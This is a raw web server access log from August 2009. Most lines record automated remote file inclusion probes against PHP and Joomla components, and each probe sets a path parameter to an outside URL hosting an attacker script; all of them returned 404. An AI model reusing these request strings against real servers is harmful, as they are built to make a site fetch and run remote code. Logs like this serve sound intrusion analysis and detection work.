213.171.225.234 - - [02/Aug/2009:05:17:26 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
201.80.7.120 - - [02/Aug/2009:05:18:28 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
201.80.7.120 - - [02/Aug/2009:05:18:55 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
123.242.165.138 - - [02/Aug/2009:05:19:16 -0400] "GET /logs/access_log.Q109061000/index.php?sayfa=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
213.171.225.234 - - [02/Aug/2009:05:19:45 -0400] "GET /logs/error_log.Q109070200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:05:19:46 -0400] "GET /logs/access_log.Q109071900/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:05:19:47 -0400] "GET /logs/access_log.Q109071700/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.59.12.99 - - [02/Aug/2009:05:20:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.242.165.138 - - [02/Aug/2009:05:20:17 -0400] "GET /logs/access_log.Q109061800%20%20/index.php?sayfa=http://lec.chonbuk.ac.kr/bak/fx29id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
201.80.7.120 - - [02/Aug/2009:05:21:26 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
201.80.7.120 - - [02/Aug/2009:05:21:40 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
74.6.149.44 - - [02/Aug/2009:05:21:41 -0400] "GET /images/items/EcOm/6033334_thumb.jpg HTTP/1.0" 200 1234 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
72.30.81.182 - - [02/Aug/2009:05:22:06 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.81.182 - - [02/Aug/2009:05:22:06 -0400] "GET /logs/access_log.Q109070500 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.171.225.234 - - [02/Aug/2009:05:23:12 -0400] "GET /logs/access_log.Q109061200/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.25.134.211 - - [02/Aug/2009:05:24:37 -0400] "GET /logs/access_log.Q109061100//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/safe.gif? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
209.25.134.211 - - [02/Aug/2009:05:24:37 -0400] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/safe.gif? HTTP/1.1" 404 240 "-" "libwww-perl/5.803"
209.25.134.211 - - [02/Aug/2009:05:24:37 -0400] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/safe.gif? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
209.59.12.99 - - [02/Aug/2009:05:25:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.6.149.44 - - [02/Aug/2009:05:25:19 -0400] "GET /images/items/EcOm/glustitch_full.jpg HTTP/1.0" 200 5047 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
209.25.134.211 - - [02/Aug/2009:05:27:13 -0400] "GET /logs/access_log.Q109062700//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://yasmin.ws//blog/hardcore/safe.gif? HTTP/1.1" 404 267 "-" "libwww-perl/5.803"
209.59.12.99 - - [02/Aug/2009:05:30:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
80.73.192.55 - - [02/Aug/2009:05:30:22 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:05:30:22 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:05:30:22 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:05:30:27 -0400] "GET /logs/access_log.Q109053000%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
72.32.69.162 - - [02/Aug/2009:05:31:54 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
72.32.69.162 - - [02/Aug/2009:05:31:54 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
72.32.69.162 - - [02/Aug/2009:05:31:54 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
72.32.69.162 - - [02/Aug/2009:05:31:55 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
208.53.138.137 - - [02/Aug/2009:05:32:24 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
208.53.138.137 - - [02/Aug/2009:05:32:29 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.823"
208.53.138.137 - - [02/Aug/2009:05:32:29 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.823"
208.53.138.137 - - [02/Aug/2009:05:32:29 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.823"
72.30.81.182 - - [02/Aug/2009:05:32:54 -0400] "GET /images/items/ HTTP/1.0" 200 79825 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.232.145.150 - - [02/Aug/2009:05:33:44 -0400] "GET /logs/access_log.Q109060300%20///appserv/main.php?appserv_root=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
66.232.145.150 - - [02/Aug/2009:05:33:44 -0400] "GET /logs///appserv/main.php?appserv_root=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
66.232.145.150 - - [02/Aug/2009:05:33:44 -0400] "GET ///appserv/main.php?appserv_root=http://220.130.180.180/main/ManieZ.jpg???? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
195.190.166.41 - - [02/Aug/2009:05:34:16 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.190.166.41 - - [02/Aug/2009:05:34:16 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
195.190.166.41 - - [02/Aug/2009:05:34:16 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.190.166.41 - - [02/Aug/2009:05:34:18 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.10.169 - - [02/Aug/2009:05:34:27 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
85.17.10.169 - - [02/Aug/2009:05:34:27 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
85.17.10.169 - - [02/Aug/2009:05:34:27 -0400] "GET /logs/access_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
85.17.10.169 - - [02/Aug/2009:05:34:27 -0400] "GET /logs/access_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.71.201 - - [02/Aug/2009:05:34:30 -0400] "GET /logs/error_log.Q109062400 HTTP/1.1" 200 2057400 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.201 - - [02/Aug/2009:05:34:46 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):12+RNSUBS%20(S0040):0 HTTP/1.1" 200 69480 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [02/Aug/2009:05:35:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.10.169 - - [02/Aug/2009:05:37:34 -0400] "GET /logs/access_log.Q109061700//index.php?DOCUMENT_ROOT=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
85.17.10.169 - - [02/Aug/2009:05:37:50 -0400] "GET /logs/access_log.Q109060400//index.php?DOCUMENT_ROOT=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.32.69.162 - - [02/Aug/2009:05:38:47 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
72.32.69.162 - - [02/Aug/2009:05:38:47 -0400] "GET /index.php?sayfa=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
72.32.69.162 - - [02/Aug/2009:05:38:47 -0400] "GET /logs/index.php?sayfa=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:05:39:03 -0400] "GET /logs/access_log.Q109060900//components/com_mambowiki/Mam***ogin.php?IP=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
72.32.69.162 - - [02/Aug/2009:05:39:05 -0400] "GET /logs/error_log.Q109061800/index.php?sayfa=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
195.190.166.41 - - [02/Aug/2009:05:40:00 -0400] "GET /logs/error_log.Q109061700%20%20//index.php?DOCUMENT_ROOT=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
195.190.166.41 - - [02/Aug/2009:05:40:09 -0400] "GET /logs/error_log.Q109060400%20%20//index.php?DOCUMENT_ROOT=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:05:40:16 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.190.166.41 - - [02/Aug/2009:05:40:17 -0400] "GET /index.php?sayfa=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
195.190.166.41 - - [02/Aug/2009:05:40:17 -0400] "GET /logs/index.php?sayfa=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
195.190.166.41 - - [02/Aug/2009:05:40:17 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
195.190.166.41 - - [02/Aug/2009:05:40:45 -0400] "GET /logs/error_log.Q109061800/index.php?sayfa=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
85.17.10.169 - - [02/Aug/2009:05:41:31 -0400] "GET /index.php?sayfa=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
85.17.10.169 - - [02/Aug/2009:05:41:31 -0400] "GET /logs/index.php?sayfa=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.17.10.169 - - [02/Aug/2009:05:41:34 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
208.53.138.137 - - [02/Aug/2009:05:41:38 -0400] "GET /logs/access_log.Q109061800/index.php?sayfa=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 234 "-" "libwww-perl/5.823"
208.53.138.137 - - [02/Aug/2009:05:41:38 -0400] "GET /index.php?sayfa=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 207 "-" "libwww-perl/5.823"
208.53.138.137 - - [02/Aug/2009:05:41:38 -0400] "GET /logs/index.php?sayfa=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 212 "-" "libwww-perl/5.823"
65.60.36.242 - - [02/Aug/2009:05:41:56 -0400] "GET //skin/zero_vote/login.php?dir=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
65.60.36.242 - - [02/Aug/2009:05:41:56 -0400] "GET /logs//skin/zero_vote/login.php?dir=http://tommymartin.info//project/projects/bot.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
208.53.138.137 - - [02/Aug/2009:05:42:00 -0400] "GET /logs/error_log.Q109061800/index.php?sayfa=http://www.culturalclassics.com//components/com_virtuemart/icon/yes.txt??%0D?? HTTP/1.1" 404 233 "-" "libwww-perl/5.823"
85.17.10.169 - - [02/Aug/2009:05:42:03 -0400] "GET /logs/error_log.Q109061800/index.php?sayfa=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
62.128.135.52 - - [02/Aug/2009:05:42:35 -0400] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
85.17.10.169 - - [02/Aug/2009:05:42:43 -0400] "GET /logs/access_log.Q109061800%20%20/index.php?sayfa=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.120.237.150 - - [02/Aug/2009:05:42:43 -0400] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
85.17.10.169 - - [02/Aug/2009:05:43:18 -0400] "GET /logs/error_log.Q109061800%20%20/index.php?sayfa=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.6.149.44 - - [02/Aug/2009:05:43:46 -0400] "GET /images/items/EcOm/glustitch_thumb.jpg HTTP/1.0" 200 1457 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
122.201.81.6 - - [02/Aug/2009:05:44:03 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:05:44:03 -0400] "GET /logs/access_log.Q109051300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:05:44:03 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:05:44:19 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:05:44:19 -0400] "GET /logs/access_log.Q109051300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:05:44:19 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
195.190.166.41 - - [02/Aug/2009:05:44:32 -0400] "GET /logs/access_log.Q109061800%20%20/index.php?sayfa=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:05:45:33 -0400] "GET /logs/access_log.Q109051300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:05:45:46 -0400] "GET /logs/access_log.Q109051300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:05:46:08 -0400] "GET /logs/access_log.Q109071500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:05:46:19 -0400] "GET /logs/access_log.Q109071500%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
210.205.6.233 - - [02/Aug/2009:05:46:40 -0400] "GET /logs/access_log.Q109070600//yabbse/Sources/Packages.php?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
210.205.6.233 - - [02/Aug/2009:05:46:40 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
210.205.6.233 - - [02/Aug/2009:05:46:40 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
210.205.6.233 - - [02/Aug/2009:05:46:40 -0400] "GET /logs/access_log.Q109070600//yabbse/Sources/Packages.php?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
210.205.6.233 - - [02/Aug/2009:05:46:40 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
210.205.6.233 - - [02/Aug/2009:05:46:40 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
210.205.6.233 - - [02/Aug/2009:05:46:41 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
210.205.6.233 - - [02/Aug/2009:05:46:41 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
210.205.6.233 - - [02/Aug/2009:05:46:41 -0400] "GET /logs/access_log.Q109070600//yabbse/Sources/Packages.php?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
210.205.6.233 - - [02/Aug/2009:05:47:19 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
210.205.6.233 - - [02/Aug/2009:05:47:19 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
210.205.6.233 - - [02/Aug/2009:05:47:19 -0400] "GET /logs/access_log.Q109052700//yabbse/Sources/Packages.php?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
210.205.6.233 - - [02/Aug/2009:05:49:11 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
210.205.6.233 - - [02/Aug/2009:05:49:11 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
210.205.6.233 - - [02/Aug/2009:05:49:11 -0400] "GET /logs/access_log.Q109052700//yabbse/Sources/Packages.php?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect//idade1.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
85.17.10.169 - - [02/Aug/2009:05:49:18 -0400] "GET /logs/access_log.Q109061000/index.php?sayfa=http://www.zahnaerzte-thun.ch//cmss/baner.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:05:50:33 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:05:50:33 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:05:50:33 -0400] "GET /logs/access_log.Q109070600//yabbse/Sources/Packages.php?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
201.80.7.120 - - [02/Aug/2009:05:50:42 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
201.80.7.120 - - [02/Aug/2009:05:50:52 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
219.117.207.76 - - [02/Aug/2009:05:51:09 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
219.117.207.76 - - [02/Aug/2009:05:51:09 -0400] "GET /logs/access_log.Q109062200%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
219.117.207.76 - - [02/Aug/2009:05:51:09 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
219.117.207.76 - - [02/Aug/2009:05:51:09 -0400] "GET /logs/access_log.Q109050800%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://tikihub.com/ray/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
216.120.237.150 - - [02/Aug/2009:05:51:52 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
216.120.237.150 - - [02/Aug/2009:05:51:52 -0400] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
216.120.237.150 - - [02/Aug/2009:05:51:52 -0400] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.oiluk.net/cache/cache_94afbfb2f291e0bf253fcf222e9d238e_86b67f94d137671950bc1d50f88d3808?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
80.73.192.55 - - [02/Aug/2009:05:52:01 -0400] "GET /logs/access_log.Q109052700%20%20//yabbse/Sources/Packages.php?sourcedir=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
85.119.154.129 - - [02/Aug/2009:05:53:05 -0400] "GET /logs/error_log.Q109062300///lostpasswd.php?env[include_prefix]=http://www.lines.it///id.txt? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
85.119.154.129 - - [02/Aug/2009:05:53:05 -0400] "GET ///lostpasswd.php?env[include_prefix]=http://www.lines.it///id.txt? HTTP/1.1" 404 214 "-" "libwww-perl/5.805"
85.119.154.129 - - [02/Aug/2009:05:53:05 -0400] "GET /logs///lostpasswd.php?env[include_prefix]=http://www.lines.it///id.txt? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
85.119.154.129 - - [02/Aug/2009:05:53:05 -0400] "GET /logs/access_log.Q109061200///lostpasswd.php?env[include_prefix]=http://www.lines.it///id.txt? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
